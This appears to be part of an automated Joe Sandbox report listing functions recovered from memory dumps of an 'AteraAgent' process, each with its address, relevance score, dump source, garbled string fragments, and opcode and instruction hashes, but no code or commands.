                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 7J8$(7J8$(7J8$07J8$0WO$0WO$87J8$@7J8$H7J8$P7J8$X7J8$x6J8$x6J8$x6J8$x6J8$x6J8$x6J8$x6J8$/E$/E$/E$/E$/E$/E$/E$6J8$6J8$6J8$6J8$6J8
                                                                                                                                                                                                                                          • API String ID: 0-1156071672
                                                                                                                                                                                                                                          • Opcode ID: 1718fa0bdeb3dc455ec833d9f3a36ce15e8b5060ba0756402e0e6d8d497ab646
                                                                                                                                                                                                                                          • Instruction ID: 25e89861ec68837d310a671a109fb8ef46a9e25fedd7dbdd73a3812e2d6e3634
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1718fa0bdeb3dc455ec833d9f3a36ce15e8b5060ba0756402e0e6d8d497ab646
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F034C70D0961A8FDB99EB28C494BB8B7B5FF5A340F1440F9D00ED7292DA39A985CF50
                                                                                                                                                                                                                                          Function 00007FFAAB56C922 Relevance: .5, Instructions: 459COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7c5680ea15a30b400a810350588eb642d67afabc1438bd549233ebbcd22e4dae
                                                                                                                                                                                                                                          • Instruction ID: 25b056e24e598203109638c6f3f3a9d0e2aa9dc0150ca2406699b7759e0ac413
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c5680ea15a30b400a810350588eb642d67afabc1438bd549233ebbcd22e4dae
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9BE1D570909A8E8FEBA8DF28C8557E977D1FF55350F04826ED84EC72A1DB7898448BC1
                                                                                                                                                                                                                                          Function 00007FFAAB56184E Relevance: .3, Instructions: 258COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ab6613236066c96ef056ce8cd762929a4e5ab72287ccd67b8a74aa83ce0e6302
                                                                                                                                                                                                                                          • Instruction ID: 0052acbae916b321ac6503a2206106a018b5bfb849be891e4327ccce9a27d3cf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab6613236066c96ef056ce8cd762929a4e5ab72287ccd67b8a74aa83ce0e6302
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15916E30D0965A8FD7A9DB24C4A47B9B7F5EF5A341F0450FA800EE72A2DB785A85CF40
                                                                                                                                                                                                                                          Function 00007FFAAB561E7E Relevance: .2, Instructions: 200COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4f05191adb6832b952b68fa15656ce718c8366e5736a45919a267d34c2e86704
                                                                                                                                                                                                                                          • Instruction ID: 7f919ed31e95ec44adcd090b250808ececd6f982bdd529843d6efa195f2be7eb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f05191adb6832b952b68fa15656ce718c8366e5736a45919a267d34c2e86704
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33711D30D0A62ACFE7A5DB2488947A9F7F5EB5A340F0480F5D04ED6292DA799E85CF40
                                                                                                                                                                                                                                          Function 00007FFAAB561E88 Relevance: .2, Instructions: 188COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: fd23d3d340844634ec83a0c8846d29b5ac61a30254db7d5f73a680ec5225bd05
                                                                                                                                                                                                                                          • Instruction ID: 40690a2170456cde08cba5e65fc1c21b2ec733496d4aad962ff67c775dfa1773
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd23d3d340844634ec83a0c8846d29b5ac61a30254db7d5f73a680ec5225bd05
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F613D30D0961ACFE7A5DB14C8957A9F3B5EB5A340F0480F5D00ED6292DA799EC9CF90
                                                                                                                                                                                                                                          Function 00007FFAAB561EB6 Relevance: .2, Instructions: 175COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0b3a298f2876d1f6131c3c92f20568f5764dc7e6d2616dc9859578dc88db8cc1
                                                                                                                                                                                                                                          • Instruction ID: 902e598a755a25d8b9e0108854f58858a893fa73ac1be14aa9d904a6348f883e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b3a298f2876d1f6131c3c92f20568f5764dc7e6d2616dc9859578dc88db8cc1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D510970D0962A8FEBA5DB28C8947E9F7F5EB5A340F0481E5D00ED6252DA399EC5CF40
                                                                                                                                                                                                                                          Function 00007FFAAB560C89 Relevance: 18.4, Strings: 14, Instructions: 922COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 0WO$0WO$x6J8$x6J8$x6J8$x6J8$x6J8$/E$/E$/E$/E$/E$/E$/E
                                                                                                                                                                                                                                          • API String ID: 0-1710367262
                                                                                                                                                                                                                                          • Opcode ID: 76dfcd7349a257bbbffd52646c5aa3f514b86cf59ac1cc9a218f87d79c30a443
                                                                                                                                                                                                                                          • Instruction ID: af21b7a64274d9ef2ff0429ddc5b729dd547f519cc02380f2c77e75ed4a74577
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76dfcd7349a257bbbffd52646c5aa3f514b86cf59ac1cc9a218f87d79c30a443
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A725970D0961A8FDB99EB28C4A4BB8B3B1FF59344F1444F9D00ED7292DA39A985CF50
                                                                                                                                                                                                                                          Function 00007FFAAB567627 Relevance: 11.7, Strings: 9, Instructions: 477COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: \J8$(\J8$0\J8$8\J8$@\J8$E$H\J8$P\J8$x6J8
                                                                                                                                                                                                                                          • API String ID: 0-871583479
                                                                                                                                                                                                                                          • Opcode ID: 426d7dd65bcf723b63f73c7ab8af65ca3b42170d9a3083737e4da368bbba4b54
                                                                                                                                                                                                                                          • Instruction ID: 29ba361df4e58bc354e89738e4dd2880b0b17f3659634bf726483b524a9786e3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 426d7dd65bcf723b63f73c7ab8af65ca3b42170d9a3083737e4da368bbba4b54
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE811461919A8A4FF755A7BCC8656F8ABE1EF5A290F0801B6C04DCB1E7DD1C18478BA0
                                                                                                                                                                                                                                          Function 00007FFAAB561B2F Relevance: 7.8, Strings: 6, Instructions: 251COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: x6J8$x6J8$6J8$6J8$6J8$6J8
                                                                                                                                                                                                                                          • API String ID: 0-2898743739
                                                                                                                                                                                                                                          • Opcode ID: 540494a632395ee4fe2c68251331bac9c56800b497b47d5592baea9c61321148
                                                                                                                                                                                                                                          • Instruction ID: 3875bd2bcbf0b2b5e6dfa6556d7d1fe8a531df83cdb168868fd3903b9a33b577
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 540494a632395ee4fe2c68251331bac9c56800b497b47d5592baea9c61321148
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7991183090962E8FDBA5DB28C8947E8B7F1EF5A340F5480A9D04DD7292DA789E85CF40
                                                                                                                                                                                                                                          Function 00007FFAAB568295 Relevance: 6.7, Strings: 5, Instructions: 437COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: x6J8$x6J8$x6J8$7J8$7J8
                                                                                                                                                                                                                                          • API String ID: 0-4014274082
                                                                                                                                                                                                                                          • Opcode ID: 27764af6b527a361e183741c1795037d8e9f354d8090402d9314228f0fbe97d4
                                                                                                                                                                                                                                          • Instruction ID: d374f1f589697d7347aaee401f9cf6fca12296ebc303dbee88b80035cfd981f0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27764af6b527a361e183741c1795037d8e9f354d8090402d9314228f0fbe97d4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5F1CD70909A5DCFDB98EB68C494BA8BBF1FF59301F1440AAD04DE72A2DB749985CF40
                                                                                                                                                                                                                                          Function 00007FFAAB566058 Relevance: 4.3, Strings: 3, Instructions: 571COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: N_I$N_^$N_^
                                                                                                                                                                                                                                          • API String ID: 0-3680607079
                                                                                                                                                                                                                                          • Opcode ID: ec03bf07b23545d03b48669ede93d0b7d151db4b711a6f49602548b752c5ce84
                                                                                                                                                                                                                                          • Instruction ID: 7d65a061aca9ee5e0e058deef018758abe86f047290aaa680c4515f9510def17
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec03bf07b23545d03b48669ede93d0b7d151db4b711a6f49602548b752c5ce84
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09F13A57B0DA928BE310A77CF8621F9BB54DF863A570881B7D18DCB0E3DC18644A86D5
                                                                                                                                                                                                                                          Function 00007FFAAB56337D Relevance: 4.0, Strings: 3, Instructions: 295COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: h7J8$h7J8$p7J8
                                                                                                                                                                                                                                          • API String ID: 0-642860734
                                                                                                                                                                                                                                          • Opcode ID: ac1eb36c2d080ee9961750a4d5f23434e77e138d3989e091082569c0402a0db9
                                                                                                                                                                                                                                          • Instruction ID: 9c8b71d658555109956386a3fadeab37e3df7e25c741260db81c5160e8954a8f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac1eb36c2d080ee9961750a4d5f23434e77e138d3989e091082569c0402a0db9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDA14F70909A9ECFDBA5DB28C4507ACB7B1FF5A340F1481BAC00ED7292DB795986CB40
                                                                                                                                                                                                                                          Function 00007FFAAB5682B5 Relevance: 3.9, Strings: 3, Instructions: 135COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: x6J8$x6J8$7J8
                                                                                                                                                                                                                                          • API String ID: 0-3843502153
                                                                                                                                                                                                                                          • Opcode ID: cd7f9a2f250ce7b601f01c938f5d84ed2fa75da6ecfd4cf86e781ce68d272dcb
                                                                                                                                                                                                                                          • Instruction ID: f569e21b74cb3f8c320cfbc89ea2fd75975e04ed133ce942a4006b360ccb0002
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd7f9a2f250ce7b601f01c938f5d84ed2fa75da6ecfd4cf86e781ce68d272dcb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A041937190DA8D8FDB59EB68C4617E8BBB1EF5A340F0440BAC04ED7293DE385985CB41
                                                                                                                                                                                                                                          Function 00007FFAAB5657E8 Relevance: 3.0, Strings: 2, Instructions: 475COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: N_^$N_^
                                                                                                                                                                                                                                          • API String ID: 0-324526423
                                                                                                                                                                                                                                          • Opcode ID: fb76c5975caf0b0ce21f1b0384ebda4537089b6fe9096b8b8bc51ecc674f50ae
                                                                                                                                                                                                                                          • Instruction ID: 07b61ce6d1345b04139aadfac0b6e93d98f682647dece595192f71918e5ef190
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb76c5975caf0b0ce21f1b0384ebda4537089b6fe9096b8b8bc51ecc674f50ae
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9D1473394D6964FE311B778E8611F87BA4DF46261B0845BBC18ECA0E3E80C548B8BD5
                                                                                                                                                                                                                                          Function 00007FFAAB562FFA Relevance: 2.9, Strings: 2, Instructions: 382COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: `7J8$`7J8
                                                                                                                                                                                                                                          • API String ID: 0-837284442
                                                                                                                                                                                                                                          • Opcode ID: 09f00eeccd96814b6bac635040435a8ef9dc0a998d65049575b682b3079256f1
                                                                                                                                                                                                                                          • Instruction ID: 3e2ee13d97961c2c738557e632296ecf1f62c585131fbd5b4db133aa74219144
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09f00eeccd96814b6bac635040435a8ef9dc0a998d65049575b682b3079256f1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05B1F16790D2924BE301B7BCF4A15F97BA5DF86239B0C45B3D18D8D0D3DD18648F8A98
                                                                                                                                                                                                                                          Function 00007FFAAB565730 Relevance: 2.8, Strings: 2, Instructions: 326COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: c$N_^
                                                                                                                                                                                                                                          • API String ID: 0-768855989
                                                                                                                                                                                                                                          • Opcode ID: e2afa651b55c8e5a0d429bfea96460f9570030c85d36a8fce8a97058be8fa70e
                                                                                                                                                                                                                                          • Instruction ID: f272d6cba8a6adfae3391e57be2f4d5c7ab595fb137aa151744de696e93b93ec
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2afa651b55c8e5a0d429bfea96460f9570030c85d36a8fce8a97058be8fa70e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D91C667A4D6A64BE31173BCF8621F87B94CF462B5B0C45B7D28DC90A3DC08148F8AD5
                                                                                                                                                                                                                                          Function 00007FFAAB56D7BE Relevance: 2.8, Strings: 2, Instructions: 316COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: @8J8$H8J8
                                                                                                                                                                                                                                          • API String ID: 0-82617017
                                                                                                                                                                                                                                          • Opcode ID: 6ff441f3009cef231ddaa871cd7433d53437fe4930f8b7bf7ed30fa2c3fed313
                                                                                                                                                                                                                                          • Instruction ID: 62f938d96d95b9bfd974c9d817b65ce87cd75335fef616c94cef08d841e654cd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ff441f3009cef231ddaa871cd7433d53437fe4930f8b7bf7ed30fa2c3fed313
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9DB19270A18A5D8FDB94EF58C894BA8B7F1FF69301F0441AAD00DE7262DA74A985CB40
                                                                                                                                                                                                                                          Function 00007FFAAB56D1F4 Relevance: 2.6, Strings: 2, Instructions: 113COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 8J8$(8J8
                                                                                                                                                                                                                                          • API String ID: 0-1672074270
                                                                                                                                                                                                                                          • Opcode ID: 764eab24ec4f68891e7a8a31b095242095b498bfc6633610bcdeb7c95d956341
                                                                                                                                                                                                                                          • Instruction ID: 07fc7295626a78622c9c47ac92b9d19123847d0ad33aabafb6b21b05dc074018
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 764eab24ec4f68891e7a8a31b095242095b498bfc6633610bcdeb7c95d956341
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98410670D1991EDFDB84EBA8C494AACF7B5FF5A340F544479D00ED72A2DA38A885CB40
                                                                                                                                                                                                                                          Function 00007FFAAB650853 Relevance: 2.2, Strings: 1, Instructions: 946COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1451671879.00007FFAAB650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB650000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab650000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                          • API String ID: 0-2766056989
                                                                                                                                                                                                                                          • Opcode ID: 73dfd433c1631aee8f946c37359c27910b98728dff9d03f08ae6d09164a02912
                                                                                                                                                                                                                                          • Instruction ID: 0b768a427ca0f39441c74524458ab56031e623df658ef80e73e0e40cb12ebca6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73dfd433c1631aee8f946c37359c27910b98728dff9d03f08ae6d09164a02912
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6F1F330B0DA898FE799D72C88656747BD1EF5B310B1442BED08EC72A3DD29EC468781
                                                                                                                                                                                                                                          Function 00007FFAAB6500D6 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1451671879.00007FFAAB650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB650000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab650000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 6E
                                                                                                                                                                                                                                          • API String ID: 0-2597168574
                                                                                                                                                                                                                                          • Opcode ID: 0f702d83c07c2aeac18f63afad990b01e2ff5daafdf3b3a227e8cdb74403007e
                                                                                                                                                                                                                                          • Instruction ID: 3262c65f9c0b8a0e475953aa310e4f3b4fd8a20c385596fc654e531cc51a751a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f702d83c07c2aeac18f63afad990b01e2ff5daafdf3b3a227e8cdb74403007e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E51C371B1CA0C8FD758DB1CD895A75B7E1FB99750B0542BEE44EC3266CE24EC128781
                                                                                                                                                                                                                                          Function 00007FFAAB567A45 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: x6J8
                                                                                                                                                                                                                                          • API String ID: 0-2378027356
                                                                                                                                                                                                                                          • Opcode ID: 7b09191586e71ad166909556a39ac5df0632f728e3cc9d038986abc1109ac077
                                                                                                                                                                                                                                          • Instruction ID: a260cfcb1f406602d1f187026b5053560f6729bd5b46401510cc17063b76ce77
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b09191586e71ad166909556a39ac5df0632f728e3cc9d038986abc1109ac077
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C419270909A8D8FDB45DB68C4506EDBBF1EF5A340F0841B6D449DB2A2DA3C588ACB50
                                                                                                                                                                                                                                          Function 00007FFAAB5649F1 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: x7J8
                                                                                                                                                                                                                                          • API String ID: 0-2357181291
                                                                                                                                                                                                                                          • Opcode ID: d0562444354705faafd03475347140bdcf548fca211ab6bfc465d22ba8f7fcb1
                                                                                                                                                                                                                                          • Instruction ID: b4056a8df8ac83f4204ef5a94147d70db5ee1ccf7d92dae863836dbd28738e00
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0562444354705faafd03475347140bdcf548fca211ab6bfc465d22ba8f7fcb1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB31223060964ECFDB84EF68C451AA9B3E2FF5A340F558579D40DC7296DE39A846CB40
                                                                                                                                                                                                                                          Function 00007FFAAB563B7D Relevance: 1.3, Strings: 1, Instructions: 57COMMON
